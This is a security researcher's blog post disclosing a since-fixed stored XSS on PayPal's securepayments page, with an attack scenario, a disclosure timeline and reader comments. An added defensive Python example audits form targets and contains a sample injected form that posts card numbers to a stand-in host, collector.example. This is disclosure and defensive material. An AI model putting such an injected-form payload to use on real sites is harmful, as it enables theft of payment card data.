Paypal critical vulnerability to steal all your Paypal funds!


Hello Readers :)

This is Zigoo0 again, and today I will talk about a Stored XSS vulnerability in “https://Securepayments.Paypal.com” that could be used by attackers to steal Paypal users' credit card and login credentials and more!

Vulnerability Title: Paypal Critical Vulnerability to steal Users Credit Cards in ClearText format

Vulnerable Page: https://securepayments.paypal.com/cgi-bin/acquiringweb

Vulnerable Parameter: template

Vulnerability Details:

The Paypal SecurePayments domain is used by Paypal users to make secure payments when purchasing from any shopping site.

This secure payments page requires Paypal users to fill in forms that include their credit card number, CVV2, expiry date and more to finalize the payment and purchase the products via their Paypal account.

The submitted data is processed through an encrypted channel (HTTPS), so attackers won't be able to sniff/steal such data.

I’ve found a Stored XSS vulnerability that affects the SecurePayment page directly, which allowed me to alter the page HTML and rewrite the page content. An attacker can provide his own HTML forms for the user to fill in and send the user's data back to the attacker’s server in clear text format, and then use this information to purchase anything on behalf of users or even transfer the users' funds to his own account!
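One way a defender could check for and prevent the form replacement described above (an added example, not code from the original post or from Paypal; the page template, the field names and the `collector.example` host are constructed for illustration):

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

PAGE_URL = "https://securepayments.paypal.com/cgi-bin/acquiringweb"  # page named in the post


def origin(url):
    """Return (scheme, host[:port]) so two URLs can be compared by origin."""
    parts = urlsplit(url)
    return (parts.scheme, parts.netloc.lower())


class FormTargetAudit(HTMLParser):
    """Record every form submission target that leaves the page's own origin."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            dest = a.get("action") or ""      # empty action submits to the page itself
        elif tag in ("button", "input") and a.get("formaction"):
            dest = a["formaction"]            # formaction overrides the form's action
        else:
            return
        target = urljoin(self.page_url, dest)
        if origin(target) != origin(self.page_url):
            self.findings.append((tag, target))


def audit(html_text, page_url=PAGE_URL):
    parser = FormTargetAudit(page_url)
    parser.feed(html_text)
    parser.close()
    return parser.findings


def render(stored_value, encode):
    """Hypothetical payment page that embeds a stored, merchant-supplied value."""
    value = escape(stored_value, quote=True) if encode else stored_value
    return ('<div id="header">' + value + '</div>'
            '<form action="/cgi-bin/acquiringweb" method="post">'
            '<input name="cc_number"><input name="cvv2"></form>')


# Constructed stored value: markup that adds a form posting to another host.
STORED = ('</div><form action="https://collector.example/c" method="post">'
          '<input name="cc_number"></form><div>')
```

Calling `audit(render(STORED, encode=False))` reports the injected form, while the encoded rendering reports nothing. A `Content-Security-Policy: form-action 'self'` response header has the browser enforce the same restriction.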


Vulnerability Consequences:

The worst attack scenario that could be carried out using this vulnerability is:

1- The attacker sets up a shopping site or hacks into any shopping site, and alters the “CheckOut” button to use the Paypal vulnerability.

2- A Paypal user browses the malformed shopping site, chooses some products, and clicks the “CheckOut” button to pay with his Paypal account.

3- The user gets redirected to https://Securepayments.Paypal.com/ to fill in the required credit card information to complete the purchase order. The price of the products to be paid is included in that same page, and as we know the attacker now controls this page!

4- Now when you (the Paypal user) click the Submit Payment button, instead of paying let’s say “100$” YOU WILL PAY THE ATTACKER WHATEVER AMOUNT THE ATTACKER DECIDES!!


Demo: Now that you’ve reviewed the vulnerability details, it’s demo time :D

In the demo video below I’ve shown how an attacker with this vulnerability could steal your credit card and login credentials!

 

As an ethical hacker, I reported this vulnerability to Paypal and it is now FIXED. Welcome back, SECURED SecurePayments :)

Below is a TimeLine of the vulnerability:

Time Line:

Vulnerability Discovery: 19/Jun/15 2:27 AM

Vulnerability Reported: 19/Jun/15 7:10 AM

Remediation Notification: Aug 24, 2015 at 7:04 PM


Thanks to the Paypal Security team for the good coordination and the fast responses to emails.

You can follow me on Twitter for the latest vulnerabilities/news/updates -> @Zigoo0 :)


13 Comments

  1. Eslam Medhat - August 26, 2015

    This is so awesome :) . Nice catch!!

  2. Anonyme - August 26, 2015

    It’s really a great find, dear Zigoo0, keep on (y). But we need the detailed PoC of the XSS (where the XSS existed) if you could share it, since it’s FIXED.

    Thanks

  3. Paypal critical Flaw allows to steal all your fundsSecurity Affairs - August 26, 2015

    […] “I’ve found a Stored XSS vulnerability that affects the SecurePayment page directly which allowed me to alter the page HTML and rewrite the page content, An attacker can provide his own HTML forms to the user to fulfill and send the users data back to attacker’s server in clear text format, and then use this information to purchase anything in behave of users or even transfer the users fund to his own account!” wrote the expert in a blog post. […]

  4. PayPal critical Flaw allows to steal all your funds - Systerity - August 26, 2015

    […] “I’ve found a Stored XSS vulnerability that affects the SecurePayment page directly which allowed me to alter the page HTML and rewrite the page content, An attacker can provide his own HTML forms to the user to fulfill and send the users data back to attacker’s server in clear text format, and then use this information to purchase anything in behave of users or even transfer the users fund to his own account!” wrote the expert in a blog post. […]

  5. Dr.FarFar - August 26, 2015

    Masha'Allah
    Always creative, engineer

  6. Rdx - August 27, 2015

    The great zig0
    Keep pewing every one xDDD

  7. PayPal Vulnerability Allows Hackers to Steal All Your Money - Middle East Post | Middle East Post - August 27, 2015

    […] explains a step by step process in his blog post, which gives a detailed explanation of the attack. Here’s what the researcher calls the worst […]

  8. PayPal Vulnerability Allows Hackers to Steal All Your Money | Geek The Net - August 27, 2015

    […] explains a step by step process in his blog post, which gives a detailed explanation of the attack. Here’s what the researcher calls the worst […]

  9. Mohammed Gad - August 27, 2015

    Awesome one!
    Keep it up Zigo0 :D

  10. Ravisankar - September 1, 2015

    Hello Ebrahim
    Good work on finding such a vulnerability and a good video of POC you have provided.
    Best Wishes for the future

    Ravisankar
    Security Researcher & Blogger

  11. Paypal.me: a new extension of the Paypal payment service for transferring money (Gim.me gim.me)! | SOSordi.net - September 1, 2015

    […] to debit any desired amount or even retrieve banking information. Discovered by a certain Zigoo0 (Ebrahim Hegazy), it has reportedly been known to Paypal since last June 19… To be continued […]

  12. Adam Davies - February 25, 2016

    Great find and nice to see Paypal following the bug bounty properly. I’ve seen several complaints about them patching bugs then pretending they weren’t issues in the past, so this is good to see!

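  13. Exploiting a Paypal vulnerability, hackers steal all your assets without a trace - G-Crew - September 15, 2016

    […] However, security researcher Ebrahim Hegazy stated: an attacker can set up a malicious online store or hijack a legitimate shopping site, and then use this vulnerability to steal users' login credentials and credit card information. […]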
